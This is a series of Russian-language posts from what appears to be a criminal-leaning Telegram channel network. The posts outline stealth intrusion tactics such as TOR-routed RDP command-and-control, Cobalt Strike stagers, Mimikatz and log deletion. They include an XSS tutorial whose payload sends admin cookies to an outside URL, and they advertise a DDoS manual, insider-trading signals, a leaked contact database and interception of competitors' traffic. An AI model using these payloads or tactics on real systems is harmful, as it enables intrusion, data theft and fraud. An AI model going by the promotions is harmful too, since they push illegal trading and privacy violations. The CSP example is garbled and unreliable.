🤕Кибер-атака? Что-то загадочное?


Или хорошо спланированное


😒Тактика скрытности включает:

Управление и контроль TOR
Избегание узлов, контролируемых EDR .
Выжидание подходящего времени и откладывание подозрительных действий для более поздних этапов атаки
Индивидуальный код и хосты соединения для каждой атаки
Техники обфускации, такие как шифрование и загрузка динамической библиотеки
Контркриминалистические методы, такие как удаление файлов журналов

Рассмотрим как пример знакомые механизмы управления и контроля с помощью клиента RDP, работающего через порт 443, маршрутизируемого через TOR. После установки браузера Tor меняется его конфигурация, чтобы он функционировал как постоянная служба, перенаправляя трафик, отправляемый на локальный (динамический) порт с помощью TOR по HTTPS через порт 443. Такие соединения бывают постоянными, поэтому "злоумышленники" могут устанавливать сессии RDP на взломанных хостах и через них, облегчать перемещение внутри сети.

😒Далее идёт Cobalt Strike как вторичный механизм управления и контроля.

Стейджеры (по типу file.exe) сетапятся удаленно на определенных целевых устройствах с использованием WinRM, каждое из которых настроено по-разному, для соединения с выделенным сервером C2 для загрузки Cobalt Strike Beacon.

Инструментарий для работы в среде обычно подразумевает сканирование сети, запуск команд, создание дампов процессов и сбор данных. Типо Mimikatz или Psexec.

Продолжение следует...
💬 GANG CHAT \
⚙️GUIDE ECOSYSTEM \
🗂ADDLIST \ 🔥LVL 2 \

/ 📀Приглашаем всех желающих к сотрудничеству.

Нужен человек, с хорошим опытом разработки смарт-контрактов и взаимодействия с сетями ETH. Аналогичный опыт работы будет плюсом. Чем больше стэк-сетей тем больше возможностей и доход.


Че там по зп:
5% от объема или 500$+ в день, по выполнению ТЗ.


💬Обратная связь:
@FG_feedback_bot

⚡️MCDXL LVL 4 | NEW LVL | TRADE | DARK | IT

👺Дроворуб-трейдер - герой современности! Его умение рубить дрова и одновременно торговать на бирже - это нечто невероятное. Он сочетает в себе силу природы и умение делать выгодные сделки. (Да-да, это я, сам себя похвалил)


Не спрашивайте каким образом получен допуск к торговой информации, вы и так сами всё знаете.


↪️ Сигналы разделены на три типа в зависимости от частоты их поступления :

🟣Дейтрейдинг
(сигналы которые поступают из наших источников, отобраны аккуратно) - Размер сделки зависит от объема вашего депозита и составляет около 5-7%.


🟣Хайриск
(Преимущественно сигналы поступают от ботов) - сделка составляет примерно 0.5-1% от вашего депозита.


🟣Swing-сделки
(не требует объяснения, все в названии) - N/A


➕ROE: 100%+ в месяц 💸💸💸
(При условии использования 3 стратегий)


✨ Для лучшего результата, мы лично убедимся, что вы разобрались со всеми нюансами торговли по сигналам, разработаем персональный рм и мм соответствующие вашему депозиту.

____________________________

🤒 WORK ⇲


↪️ Что на счет рубки дров, могу предложить вам сотрудничество. Если у вас есть:

🟣Минимальное понимание основ администрирования серверов.

🟣Понимание основных протоколов работы.

🟣Базовые знания html|css если работаете с лендингами.

🟣Понимание основ криптографии.

🟣Умение спуферить данные которые приходят/уходят в вашей работе.

🟣Знания распределения рисков на сделки, что бы не потерять свои деньги.


✨Зачем это нужно? Иначе вы будете брести в полной тьме, даже не понимая, что делаете от слова совсем и вообще. Успех работы зависит для начала ОТ ПОНИМАНИЯ ДЕЙСТВИЙ, КОТОРЫЕ ВЫ ВЫПОЛНЯЕТЕ. И второе КАК ИМЕННО ЭТО ДЕЙСТВИЕ ФУНКЦИОНИРУЕТ.


🧬Хочешь в MCDXL LVL 4 - пиши @drovorub_UI

🧬Хочешь получать инсайд-сигналы, готовь 20 тысяч зеленых и я буду давать информацию за процент из чистой прибыли

🧬 Хочешь всё сразу, но нет ни денег ни знаний, договаривайся с админами через @FG_feedback_bot, но учти что мы тебе не доверяем и твоя задача будет доказать, что ты не сольешь информацию или не сольешься сам в нужный момент.

Улучшения, объяснения, результаты и прочая информация будет постепенно поступать в публичные каналы, благодарю от всей души вселенную FG за предоставленную возможность опубликовать свой оффер, иду рубить дрова.

💬 GANG CHAT
⚙️GUIDE ECOSYSTEM
🗂ADDLIST \ 🔥LVL 2

Вижу есть люди, которые еще не подписаны на FG TRADE, а зря, вот вам информация, а там уже сами решайте что делать 😎

https://news.1rj.ru/str/FG_TRADE/451

💥XSS ИЛИ КАК СПИЗДЕТЬ КУКИ АДМИНА

Ну че вы? Как дела? Седня будем разбираться с ахуительной ошибкой которая есть у всех новичков и самоучек. Веб разработчики готовимся

Не буду ебать вам мозг высерами из википедии объясню на простом примере:

У нас есть Димон - фронтендер и дядя Миша - заказчик
Дядя Миша говорит Димону:
-Бля, захуяч ка мне панельку с отзывами, хочу знач чтоб клиенты могли писать что у меня лучший автосервис
-Ok, boss

Ну и естстественно димон делает всё наотъебись и идёт спать. И тут появляется Дартаньян, ахуенный хакер, решивший спиздеть бд дяди Миши. Заходит знач он на сайт и видит строку с отзывами. В следующую секунду там появляется вот такой вот текст:

<noscript> new Image().src='https://requestinspector.com/inspect/01h0g8ygn7b83t868ka4bncmq8/'+document.cookie; </noscript>

Когда дядя Миша решает проверить что там наворотил Димон, его кукисы отлетают Дартаньяну. Потом с помощью них он залетает в админку, закрепляется на хосте и ворует бд. А что с Димоном? Вместо денег он получает по ебалу.

Итак, думаю все уже поняли в чём заключается XSS, но еще раз поясню. Это когда у пользователя есть возможность ебануть что-то на JS и это исполнится как код на странице.

В моём примере создалось изображение, местоположение которого отсылало на удалённый сервер вместе с кукисами. Я привел лишь базовый пример уязвимости, а так хакер ограничен лишь своим скилом и фантазией.

Окей, а как избежать подобной хуйни?

👉Добавляем CSP header. Например:
Content-Security-Policy: noscript-src 'self'
Более подробно читай тут: https://auth0.com/blog/defending-against-xss-with-csp/

👉Добавляем WAF, его вариаций дохуя, так что загуглите сами. Да и через CSP защититься намного проще, если вы новичёк в вебе забейте хуй на этот пункт. Не упомянуть о вафе я просто не мог))

👉Тестируем абсолютно все поля пользовательского ввода. Можно например туда вставлять этот код:
<noscript>alert('XSS');</noscript>
Есть отстук? Знач нашли уязвимость. Пиздуем фиксить

👉Используем только безопасные функции JS, никаких innerHTML. (ЛГ 💜 СФ )

💬 GANG CHAT \
⚙️GUIDE ECOSYSTEM \
🗂ADDLIST \ 🔥LVL 2 \

💀💀50cтраниц про ддос.💀💀

Мануал на достаточно трудном языке - нужно или перечитывать или гуглить, но все, что нужно тут есть. Много теории, настройки, скриптов. Много сказано про методы, софты и серваки, под конец неплохая инф про анонимность, заработок и обход защиты. Я даже пару раз хорошо поржал.
⚫️⚫️⚫️⚫️
⚫️
⚫️
⚫️ https://news.1rj.ru/str/FG_FAQ_FG/95
⚫️
⚫️
⚫️⚫️⚫️⚫️⚫️⚫️⚫️
💬 GANG CHAT \
⚙️GUIDE ECOSYSTEM \
🗂ADDLIST \ 🔥LVL 2 \

👑Кто такой Кевин Митник?

Опишите его навыки и историю личности боту.

🔤@FG_feedback_bot

За самый креативный ответ мы предоставим возможность узнать новое из мира социальной инженерии. В пабликах вы такой информации никогда не найдёте. Игра началась 🤝

🆕За базой РУ говорящих тимлидов, CEO и прочих стартаперов с гео кремниевой долины, пишите в фидбек бота с фразой valley.

@FG_feedback_bot

🎁 Нетворкинг и связи которых не найти в открытых источниках, теперь актуальны для истинных ценителей продуктивного сотрудничества.

🆕Обновление и дополнительные возможности. Как назвать это направление, создадим опрос ниже.

▛▀▀▀▀▀
Что это?
⮑Это поиск горячих лидов, которые необходимы каждому бизнесу и есть существующие компании, у которых их много.

Миссия
⮑Помните Робин Гуда? Так вот вспомните ещё раз.
▙▄▄▄▄

🔤Принцип работы и актуальные технологии.

⮑Перехват входящего и исходящего траффика от конкурентов.

⮑Рассылка по базам конкурентов, после их рекламных кампаний.

⮑B2B генерация, парсинг организаций и раскрытие их доходов.

⮑Комплексное сопровождение и оптимизация рабочих процессов, повышение KPI.

🔤Проблемы и решения.

❌Нет готовых решений для входящего потока траффика, из-за устоявшегося мнения, что все работает хорошо и так.

❌Минимальный ROI, из-за чего приходится возвращать свою маржу обратно в поиск траффика.

❌Отдел продаж курит бамбук из-за минимального количества лидов.

✈️На каждого льва найдется лев покруче, это бизнес, в котором побеждает сильнейший, в особенности у кого лучше технологии.

✈️Снижение издержек за счет подключения эффективной системы с лучшей конверсией.

✈️Менеджеры получают зарплату за работу, потому что заявок стало больше.

🔤Этапы сотрудничества.

1. 5 ваших конкурентов и их полный анализ.
2. Номера телефонов, прочие данные.
3. Оценка ваших возможностей для обработки.
4. Наличие CRM систем, Открытого API для разработки и интеграций.
5. NDA и договора, формированию стоимости за лида.
6. Сопровождение, поддержка на всех этапах, полезные инсайты.
7. Улучшение результатов, систем и качества обработки.

🔤Обратная связь\Есть идея?
✈️@FG_feedback_bot

🥶Кейсы, записанные диалоги обработки клиентов.

🔤Продажа стоматологического оборудования

🔤Продажа квартир ЖК

🔤Юридические услуги

🔤Помощь в поставках на маркет-плейсы

🔤Дизайн интерьера

➗🎙FG_faq/drive/audios - t.me/FG_FAQ_FG/97

🇷🇺Кстати, кто работает по РУ, с такими мы не сотрудничаем) Имеется ввиду скам. Поэтому можем заявить однозначно, что предварительная аналитика проектов будет нацелена, на выявление этих действий. 🤝

Пов: Где то плачет один сотрудник из службы безопасности банка)

💻Павел Дуров будет спикером на одной из самых крупных конференций TOKEN 2049 в Дубае, которая состоится 18 апреля.

Среди спикеров также будут: СЕО Binance, Артур Хейс, CEO Tether и много других немало известных людей, такие люди просто так вместе не собираются это точно .

📱✅Тем временем что происходит во всем мире с мета-мессенджерами комично. 🚀 Ждём очередной рост трафика в Telegram ❤️

👀Downdetector.com